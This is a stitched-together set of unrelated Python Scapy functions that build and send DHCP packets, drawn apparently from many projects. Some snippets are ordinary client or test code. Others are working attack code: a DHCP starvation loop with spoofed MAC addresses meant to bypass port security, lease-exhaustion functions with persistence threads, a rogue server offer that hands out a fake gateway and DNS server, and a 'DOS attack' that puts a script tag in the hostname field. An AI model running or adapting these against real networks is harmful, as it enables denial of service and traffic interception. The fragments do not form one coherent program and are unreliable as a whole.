def send_dhcp_packet(self, mac: MacAddress, state: DHCPState, dhcp_desc: DHCPDescriptor = None): """ Send DHCP packet and record state in dhcp_client_state. Args: mac: MAC address of interface state: state of DHCP packet dhcp_desc: DHCP protocol state. Returns: """ ciaddr = None # generate DHCP request packet if state == DHCPState.DISCOVER: dhcp_opts = [("message-type", "discover")] dhcp_desc = DHCPDescriptor(mac=mac, ip="", state_requested=DHCPState.DISCOVER) self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid elif state == DHCPState.REQUEST: dhcp_opts = [("message-type", "request"), ("requested_addr", dhcp_desc.ip), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.REQUEST pkt_xid = dhcp_desc.xid ciaddr = dhcp_desc.ip elif state == DHCPState.RELEASE: dhcp_opts = [("message-type", "release"), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.RELEASE self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid ciaddr = dhcp_desc.ip else: LOG.warning("Unknown egress request mac %s state %s", str(mac), state) return dhcp_opts.append("end") with self._dhcp_notify: self.dhcp_client_state[mac.as_redis_key()] = dhcp_desc pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff") pkt /= IP(src="0.0.0.0", dst="255.255.255.255") pkt /= UDP(sport=68, dport=67) pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr) pkt /= DHCP(options=dhcp_opts) LOG.debug("DHCP pkt %s", pkt.show(dump=True)) sendp(pkt, iface=self._dhcp_interface, verbose=0)
def gen_request_unicast(self): """ Generate DHCP REQUEST unicast packet. Same comments as in gen_request apply. """ dhcp_req = (self.gen_ether_ip_unicast() / self.gen_udp() / self.gen_bootp_unicast() / DHCP(options=[("message-type", "request"), ("client_id", mac2str(self.client_mac)), ("param_req_list", self.prl), "end"])) logger.debug('Generated request %s.', dhcp_req.summary()) return dhcp_req
def dhcpRequest(dhcp_offer, src_mac_random, interface): transaction_id = dhcp_offer[0][BOOTP].xid server_id = dhcp_offer[0][DHCP].options[1][1] requested_addr = dhcp_offer[0][BOOTP].yiaddr print(requested_addr) options = [("message-type", "request"), ("server_id", server_id), ("requested_addr", requested_addr), ("end", "0")] dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \ / IP(src='0.0.0.0', dst='255.255.255.255') \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id) \ / DHCP(options=options) sendp(dhcp_request, iface=interface) return requested_addr
def gen_release(self): dhcp_release = ( self.gen_ether_ip_request(self.server_mac, self.server_ip, self.client_ip) / self.gen_udp_bootp() / DHCP(options=[ ("message-type", "release"), ("server_id", self.server_id), "end" ]) ) logger.debug('Generated release.') logger.debug(dhcp_release.summary()) return dhcp_release
def gen_discover(self): dhcp_discover = ( self.gen_ether_ip_discover() / self.gen_udp_bootp() / DHCP(options=[ ("message-type", "discover"), # MAY # ("param_req_list", PARAM_REQ_LIST), "end" ]) ) logger.debug('Generated discover.') logger.debug(dhcp_discover.summary()) return dhcp_discover
def build_request(mac_addr, target, req_ip, hostname, trans_id): """ build a DHCP request packet :param mac_addr: the mac address :param target: the target server's ip which we are going to attack. (this is the dst ip) :param req_ip: the requested IP :param hostname: the host name :param trans_id: the transaction ID :return: scapy DHCP request packet """ return Ether(src=str(mac_addr), dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") \ / UDP(sport=68, dport=67) / BOOTP(chaddr=str_2_mac(mac_addr), xid=trans_id) \ / DHCP(options=[("message-type", "request"), ("server_id", target), ("requested_addr", req_ip), ("hostname", hostname), ("param_req_list", 0), "end"])
def dhcp_discover(tx_if, rx_if, tx_src_ip, tx_dst_ip, server_ip, proxy_ip, client_mac): """Send and check DHCP DISCOVER proxy packet.""" rxq = RxQueue(rx_if) txq = TxQueue(tx_if) sent_packets = [] dhcp_discover = Ether(src=client_mac, dst="ff:ff:ff:ff:ff:ff") / \ IP(src=tx_src_ip, dst=tx_dst_ip) / \ UDP(sport=UDP_SERVICES.bootpc, dport=UDP_SERVICES.bootps) / \ BOOTP(op=1,) / \ DHCP(options=[("message-type", "discover"), "end"]) sent_packets.append(dhcp_discover) txq.send(dhcp_discover) ether = rxq.recv(2) if ether is None: raise RuntimeError('DHCP DISCOVER timeout') if ether[IP].src != proxy_ip: raise RuntimeError("Source IP address error.") print "Source IP address: OK." if ether[IP].dst != server_ip: raise RuntimeError("Destination IP address error.") print "Destination IP address: OK." if ether[UDP].dport != UDP_SERVICES.bootps: raise RuntimeError("UDP destination port error.") print "UDP destination port: OK." if ether[UDP].sport != UDP_SERVICES.bootpc: raise RuntimeError("UDP source port error.") print "UDP source port: OK." if ether[DHCP].options[1][0] != 'relay_agent_Information': # option 82 raise RuntimeError("Relay agent information error.") option_82 = ether[DHCP].options[1][1] if ether[DHCP].options[0][1] != 1: # 1 - DISCOVER message raise RuntimeError("DHCP DISCOVER message error.") print "DHCP DISCOVER message OK." return option_82
def dhcpDiscover(src_mac_random, dhcp_server_ip, interface): options = [("message-type", "discover"), ("max_dhcp_size", 1500), ("client_id", mac2str(src_mac_random)), ("lease_time", 10000), ("end", "0")] transaction_id = random.randint(1, 900000000) dhcp_discover = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \ / IP(src='0.0.0.0', dst=dhcp_server_ip) \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id, flags=0xffffff) \ / DHCP(options=options) sendp(dhcp_discover, iface=interface) dhcp_offer = sniff( count=1, lfilter=lambda p: BOOTP in p and p[BOOTP].xid == transaction_id) return dhcp_offer
def send_dhcp_renew_address(info): dst_mac = info['srv_mac'] # Broadcast address fake_mac = info['fake_mac'] options = [("message-type", "request"), ("max_dhcp_size", 1500), ("client_id", fake_mac), ("lease_time", 10000), ("server_id", info['srv_id']), ("end", "0")] transaction_id = random.randint(1, 900000000) dhcp_request = (Ether(src=src_mac, dst=dst_mac) / IP(src=info['taken_ip'], dst=info['srv_ip']) / UDP(sport=68, dport=67) / BOOTP(chaddr=[fake_mac], ciaddr=info['taken_ip'], xid=transaction_id, flags=0x0) / DHCP(options=options)) sendp(dhcp_request, iface=iface, verbose=False)
def gen_inform(self): dhcp_inform = ( self.gen_ether_ip_request(self.server_mac, self.server_ip, self.client_ip) / self.gen_udp_bootp() / DHCP(options=[ ("message-type", "inform"), # MAY # ("param_req_list", self.param_req_list) "end" ]) ) logger.debug('Generated inform.') logger.debug(dhcp_inform.summary()) return dhcp_inform
def gen_decline(self): dhcp_decline = ( self.gen_ether_ip_request(self.server_mac, self.server_ip, self.client_ip) / self.gen_udp_bootp() / DHCP(options=[ ("message-type", "decline"), ("server_id", self.server_ip), ("requested_addr", self.client_ip_offered), "end" ]) ) logger.debug('Generated decline.') logger.debug(dhcp_decline.summary()) return dhcp_decline
def persistant(mac_and_ip, dhcp_server_ip, interface): while (True): for i in mac_and_ip: transaction_id = random.randint(1, 900000000) server_id = dhcp_server_ip requested_addr = i[0] options = [("message-type", "request"), ("server_id", server_id), ("requested_addr", requested_addr), ("end", "0")] dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=i[1]) \ / IP(src=requested_addr, dst='255.255.255.255') \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(i[1])], xid=transaction_id) \ / DHCP(options=options) sendp(dhcp_request, iface=interface) sleep(120)
def __init__ (self): base_pkt = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67,chksum=0) \ /BOOTP(chaddr=b'123456',xid=55555,yiaddr='1.2.3.4')/DHCP(options=[("message-type","discover"), ("server_id", '1.2.3.4'),"end"]) FastParser.__init__(self, base_pkt) self.add_field('Ethernet.dst', 'dstmac') self.add_field('Ethernet.src', 'srcmac') self.add_field('IP.ihl', 'ihl', fmt = "!B") self.add_field('IP.dst', 'dstip') self.add_field('IP.src', 'srcip') self.add_field('IP.chksum', 'chksum') self.add_field('BOOTP.xid', 'xid') self.add_field('BOOTP.chaddr', 'chaddr') self.add_field('BOOTP.ciaddr', 'ciaddr') self.add_field('BOOTP.yiaddr', 'yiaddr') self.add_field('DHCP options.options', 'options', getter = self.get_options, setter = self.set_options) msg_types = [{'id': 1, 'name': 'discover'}, {'id': 2, 'name': 'offer'}, {'id': 3, 'name': 'request'}, ] self.msg_types = {} for t in msg_types: self.msg_types[t['id']] = t self.msg_types[t['name']] = t opts = [{'id': 53, 'name': 'message-type', 'type': 'byte'}, {'id': 54, 'name': 'server_id', 'type': 'int'}, {'id': 50, 'name': 'requested_addr', 'type': 'int'}, {'id': 51, 'name': 'lease-time', 'type': 'int'}, {'id': 58, 'name': 'renewal_time', 'type': 'int'}, {'id': 59, 'name': 'rebinding_time', 'type': 'int'}, {'id': 1, 'name': 'subnet_mask', 'type': 'int'}, {'id': 15, 'name': 'domain', 'type': 'str'}, ] self.opts = {} for opt in opts: self.opts[opt['id']] = opt self.opts[opt['name']] = opt
def make_dhcp_discover(self): """ Creates a DHCPDISCOVER packet using scapy Returns ------- Packet A scapy DHCPDISCOVER Packet """ ethernet = Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') ip = IP(src='0.0.0.0', dst='255.255.255.255') udp = UDP(dport=67, sport=68) bootp = BOOTP(chaddr=self.mac_address_raw, xid=RandInt()) dhcp = DHCP(options=[('message-type', 'discover'), ("hostname", self.hostname), 'end']) dhcp_discover_pkt = ethernet / ip / udp / bootp / dhcp return dhcp_discover_pkt
def dhcp_discover(spoofed_mac, i_face): """ sending dhcp discover from the spoofed mac address (broadcast) :param spoofed_mac: fake mac address :param i_face: the systems network interface for the attack """ ip_dest = '255.255.255.255' mac_dest = "ff:ff:ff:ff:ff:ff" dsc = Ether(src=mac2str(spoofed_mac), dst=mac_dest, type=0x0800) dsc /= IP(src='0.0.0.0', dst=ip_dest) dsc /= UDP(sport=68, dport=67) dsc /= BOOTP(chaddr=mac2str(spoofed_mac), xid=random.randint(1, 1000000000), flags=0xFFFFFF) dsc /= DHCP(options=[("message-type", "discover"), "end"]) sendp(dsc, iface=i_face) print("discover sent")
def run(interface, xs): """ This function launch DHCP DISCOVER DOS attack :param inter: interface to be launched the attack :type inter: str """ global src_mac global xi global follow global inter follow = False #if len(interface) > 0: inter = interface if xs == "": xss = "<script>alert('hola')</script>" else: xss = xs try: src_mac = get_if_hwaddr(inter) print str(src_mac) ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) while not follow: xi = RandString(8, "1234567890abcdef") xi = "0x" + str(xi) res = src_mac.split(":") ch = "" for i in res: ch = ch + chr(int(i, 16)) bootps = BOOTP(xid=int(xi, 16), ciaddr='0.0.0.0', chaddr=ch) host = "<script>alert('hola')</script>" dhcps = DHCP(options=[("message-type", "discover"), ("hostname", host), "end"]) packet = ethernet / ip / udp / bootps / dhcps conf.checkIPaddr = False pkt = srp1(packet, iface=inter, verbose=1) if BOOTP in pkt: is_DHCP(pkt) #sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter except KeyboardInterrupt: pass
def find_dhcp(iface): """ Recuperation des informations a partir du serveur DHCP iface : l'interface utiliser pour lancer la recherche Retourne : 0. l'adresse du serveur bootp, 1. le masque de sous reseau, 2. la route par defaut (gateway), 3. l'adresse du serveur dhcp, 4-5. les adresses des dns 1 & 2 6. le nom de domaine 7. l'adresse IP proposee 7. l'adresse mac de l'interface iface """ rq = Ether(dst="ff:ff:ff:ff:ff:ff") / \ IP(src="0.0.0.0", dst="255.255.255.255") / \ UDP(sport=68, dport=67) / \ BOOTP(chaddr=get_if_raw_hwaddr(iface)[1]) / \ DHCP(options=[("message-type", "discover"), "end"]) try: reponse, perdu = srp(rq, timeout=10) except PermissionError: tools.info("find DHCP, Permission non accordee") return None if not reponse: return None bootp_srv = reponse[0][1][BOOTP].siaddr yiaddr = reponse[0][1][BOOTP].yiaddr hwdst = reponse[0][1][Ether].dst opts = reponse[0][1][DHCP].options dhcp_mask = member('subnet_mask', opts, key=lambda x: x[0])[1] gateway = member('router', opts, key=lambda x: x[0])[1] dhcp_srv = member('server_id', opts, key=lambda x: x[0])[1] dns1, dns2 = member('name_server', opts, key=lambda x: x[0])[1:] domain = member('domain', opts, key=lambda x: x[0])[1].decode() return [ bootp_srv, dhcp_mask, gateway, dhcp_srv, dns1, dns2, domain, hwdst, yiaddr ]
def gen_inform(self): """ Generate DHCP inform packet (unicast). [:rfc:`7844#section-3.`] :: MUST contain the Message Type option, .. note:: currently not being used. """ dhcp_inform = ( self.gen_ether_ip_unicast() / self.gen_udp() / self.gen_bootp_unicast() / DHCP(options=[("message-type", "inform"), ("client_id", mac2str(self.client_mac)), "end"])) logger.debug('Generated inform.') logger.debug(dhcp_inform.summary()) return dhcp_inform
def discover(): ether_layer = Ether( src=DHCP_CLIENT_MAC_ADDRESS, dst=BROADCAST_MAC_ADDRESS, ) ip_layer = IP( src=DHCP_DISCOVER_HOST_IP_ADDRESS, dst=LIMITED_BROADCAST_IP_ADDRESS, ) udp_layer = UDP( sport=DHCP_CLIENT_PORT, dport=DHCP_SERVER_PORT, ) # BOOTPの引数chaddrについて: # Scapyを使った他の実装を見たところ # (https://github.com/david415/dhcptakeover/blob/master/dhcptakeover.py)、 # scapy.all.get_if_raw_hwaddr()を使っていた # scapy.all.get_if_raw_hwaddr()の中で `mac = mac2str(str(link_addr))` しており # mac2str()関数にて、規則に従いMACアドレスを文字列化してた # コメントに「dumbnet module」とあったので、使用モジュールの関係上、このロジックとなっているのかもしれない chaddr = mac2str(DHCP_CLIENT_MAC_ADDRESS) # なお、単にMACアドレスそのものを渡してもOKだが、その場合には同一のDHCPサーバから複数レスポンスが返ってくる # chaddr = DHCP_CLIENT_MAC_ADDRESS bootp_layer = BOOTP(chaddr=chaddr) dhcp_layer = DHCP(options=[('message-type', 'discover'), 'end']) discover_packet = ether_layer / ip_layer / udp_layer / bootp_layer / dhcp_layer # 作成したパケットを念のため確認 discover_packet.show() # Scapyのドキュメント通りに設定して送信 # http://scapy.readthedocs.io/en/latest/usage.html#identifying-rogue-dhcp-servers-on-your-lan conf.checkIPaddr = False answers, _ = srp(discover_packet, iface=USB_INTERFACE_NAME, multi=True) for send_packet, recv_packet in answers: print 'DHCP Server - MAC: {}, IP: {}'.format(recv_packet[Ether].src, recv_packet[IP].src)
def build_renew(src_mac, dst_mac, src_ip, target, req_ip, hostname, trans_id): """ build a renew DHCP request :param src_mac: the src mac :param dst_mac: the dst mac :param src_ip: the src ip :param target: the target server's ip which we are going to attack. (this is the dst ip) :type target: str :param req_ip: the requested IP :param hostname: the host name :param trans_id: the transaction ID :type trans_id: int :return: DHCP renew request packet :rtype: scapy DHCP packet """ return Ether(src=str(src_mac), dst=str(dst_mac)) / IP(src=src_ip, dst=target) / UDP(sport=68, dport=67) \ / BOOTP(chaddr=str_2_mac(src_mac), xid=trans_id) \ / DHCP(options=[("message-type", "request"), ("server_id", target), ("requested_addr", req_ip), ("hostname", hostname), ("param_req_list", 0), "end"])
def gen_release(self): """ Generate DHCP release packet (broadcast?). [:rfc:`7844#section-3.`] :: MUST contain the Message Type option and MUST contain the Server Identifier option, .. note:: currently not being used. """ dhcp_release = (self.gen_ether_ip() / self.gen_udp() / self.gen_bootp() / DHCP(options=[("message-type", "release"), ("client_id", mac2str(self.client_mac)), ("server_id", self.server_ip), "end"])) logger.debug('Generated release.') logger.debug(dhcp_release.summary()) return dhcp_release
def generatePacketServerOffer(self, type, IPClient, packet): return (Ether(src=self.__DHCPMac, dst=packet[Ether].src) / IP(src=self.__DHCPServerIp, dst="255.255.255.255") / UDP(sport=67, dport=68) / BOOTP(op=2, yiaddr=IPClient, ciaddr=packet[IP].src, siaddr=self.__DHCPServerIp, chaddr=packet[Ether].chaddr, xid=packet[BOOTP].xid) / DHCP(options=[ ('server_id', self.__DHCPServerIp), ("lease_time", self.__leaseTime), ('renewal_time', self.__renewalTime), ('rebinding_time', self.__rebindingTime), ('subnet_mask', self.__fakeSubnetMask), ('router', self.__fakeGatewayIP), ('message-type', type), ("name_server", self.__fakeDNSServer), 'end'] ))
def gen_request(self, server_mac=BROADCAST_MAC, server_ip=BROADCAST_ADDR, client_ip=META_ADDR): # TODO: 3.1. SHOULD randomize the ordering of options dhcp_req = ( self.gen_ether_ip_request(server_mac, server_ip, client_ip) / self.gen_udp_bootp() / DHCP(options=[ ("message-type", "request"), # MAY # ("param_req_list", PARAM_REQ_LIST), # If the message is in response # to a DHCPOFFER, it MUST contain the corresponding Server # Identifier option and the Requested IP address ("server_id", self.server_id), ("requested_addr", self.client_ip_offered), "end" ]) ) logger.debug('Generated request.') logger.debug(dhcp_req.summary()) return dhcp_req
def send_the_discover(tarip, interface, per): """ This is called from the while loop in "main()". It sends a fabricated DHCP req to the server in order to offcourse lease one of the free ip's :param tarip: :param interface: :param per: :return: """ fake_mac = generateFakeMac( ) # Fabricated mac we use as the src in the Discover. Meant to be bound to a free ip myxid = random.randrange(5234, None, 3) # The id for each first DHCP handshake dhcp_discover = Ether(src=fake_mac, dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0", dst=tarip)/UDP(sport=68,dport=67)\ /BOOTP(chaddr=[mac2str(fake_mac)], xid=myxid)/DHCP(options=[("message-type", "discover"), "end"]) #Discover packet print(fake_mac) # Print the fabricated, to be bound, mac addr sendp(dhcp_discover ) # Send Discover to lease an ip for the mac printed above print("DISCOVER SENT") # Updating we sent a Discover massage get_the_offer(fake_mac, myxid, tarip, interface, per) # Proceed to next step of DHCP handshake
def gen_decline(self): """ Generate DHCP decline packet (broadcast). [:rfc:`7844#section-3.`] :: MUST contain the Message Type option, MUST contain the Server Identifier option, MUST contain the Requested IP address option; .. note:: currently not being used. """ dhcp_decline = ( self.gen_ether_ip() / self.gen_udp() / self.gen_bootp() / DHCP(options=[("message-type", "decline"), ("server_id", self.server_ip), ("requested_addr", self.client_ip), "end"])) logger.debug('Generated decline.') logger.debug(dhcp_decline.summary()) return dhcp_decline
def DHCP_Request_Sendonly(ifname, options, param_req_list, wait_time=1): request = Ether(dst='ff:ff:ff:ff:ff:ff', src=options['MAC'], type=0x0800) / IP( src='0.0.0.0', dst='255.255.255.255') / UDP( dport=67, sport=68) / BOOTP( op=1, chaddr=chaddr(options['client_id']), siaddr=options['Server_IP'], ) / DHCP(options=[ ('message-type', 'request'), ('server_id', options['Server_IP']), ('requested_addr', options['requested_addr']), # Hardware_Type = 1(一个字节),需要添加在client_id前面 ('client_id', b'\x01' + options['client_id']), ('param_req_list', param_req_list), ('end') ]) if wait_time != 0: time.sleep(wait_time) sendp(request, iface=scapy_iface(ifname), verbose=False) else: sendp(request, iface=scapy_iface(ifname), verbose=False)
def dhcp_request(req_ip, spoofed_mac, server_ip, i_face): """ sending dhcp request for a specific ip from the spoofed mac address (broadcast) :param req_ip: ip requested by the attacker for the fake mac address :param spoofed_mac: fake mac address :param server_ip: dhcp servers ip :param i_face: the systems network interface for the attack """ ip_dest = '255.255.255.255' mac_dest = "ff:ff:ff:ff:ff:ff" req = Ether(src=mac2str(spoofed_mac), dst=mac_dest) req /= IP(src="0.0.0.0", dst=ip_dest) req /= UDP(sport=68, dport=67) # generating random transaction ID req /= BOOTP(chaddr=mac2str(spoofed_mac), xid=random.randint(1, 1000000000)) req /= DHCP(options=[("message-type", "request"), ("server_id", server_ip), ("requested_addr", req_ip), "end"]) sendp(req, iface=i_face) print('request sent')
def gen_discover(self): """ Generate DHCP DISCOVER packet. [:rfc:`7844#section-3.1`] :: SHOULD randomize the ordering of options If this can not be implemented MAY order the options by option code number (lowest to highest). [:rfc:`7844#section-3.`] :: MAY contain the Parameter Request List option. """ dhcp_discover = (self.gen_ether_ip() / self.gen_udp() / self.gen_bootp() / DHCP(options=[("message-type", "discover"), ("client_id", mac2str(self.client_mac)), ("param_req_list", self.prl), "end"])) logger.debug('Generated discover %s.', dhcp_discover.summary()) return dhcp_discover
def send_discover(self): print "" print "Starting Starvation" print "" for i in range(255): # Generate transaction id transaction_id = random.randint(1, 900000000) # Generate fake CHADDR spoofed_chaddr = str(RandMAC()) while spoofed_chaddr in spoofed_chaddr_list: print "Duplicate SPOOF CHADDR detected, generating a new one" spoofed_chaddr = str(RandMAC()) spoofed_chaddr_list.append(spoofed_chaddr) # Create discover packet, specifying source mac to bypass port security discover_packet = Ether(src=source_mac,dst="ff:ff:ff:ff:ff:ff") discover_packet /= IP(src="0.0.0.0", dst="255.255.255.255") discover_packet /= UDP(sport=68, dport=67) discover_packet /= BOOTP(chaddr=spoofed_chaddr, xid=transaction_id) discover_packet /= DHCP(options=[("message-type", "discover"), "end"]) sendp(discover_packet, iface=interface, verbose=0) sleep(0.01)
def craft_dhcp_request(packet, myxid, fake_mac, tarip, interface, per): """ This func deals with the 3rd step of the handshake- sending the request (as a respones to an earlier Offer we got earlier) :param packet: We passed as an arg the earlier catched DHCP Offer packet :param myxid: :param fake_mac: :param tarip: :param interface: :param per: :return: """ dhcp_req = Ether(src=fake_mac, dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0", dst=tarip)/\ UDP(sport=68,dport=67)/BOOTP(chaddr=[mac2str(fake_mac)], xid=myxid)\ /DHCP(options=[("message-type", "request"), ("server_id", (packet[DHCP].options[1][1])), ("requested_addr", packet[BOOTP].yiaddr), ("param_req_list", 0), "end"]) # This is the DHCP req we are going to send sendp(dhcp_req, iface=interface) # We send the DHCP req print("SENT REQUEST. DONE! " + str(packet[BOOTP].yiaddr) + "\n") # Informs that the req was successfully sent # Now we prepare variables to use if the user wants PERSISTENCE the_lease_time = packet[DHCP].options[2][ 1] # Extracting the lease time from the packet (DHCP Offer given as an arg) my_ip = packet[ BOOTP].yiaddr # The ip we leased from the server (Bound to "fake_mac") server_mac = packet[ Ether].src # The extracted server mac (Extracted from the Offer) server_id = packet[DHCP].options[1][ 1] # The extracted server mac (Extracted from the Offer) if per: # Do the next steps if the user chose persistence per_thread = Thread( target=activate_persistence, args=[ fake_mac, tarip, interface, the_lease_time, my_ip, server_mac, server_id ] ) # We open and start a thread dealing with keeping bond between our fabricated mac addr (fake_mac) and the ip given from the server per_thread.start( ) # The persistence is kept active through the thread. Code keeps running at the same time.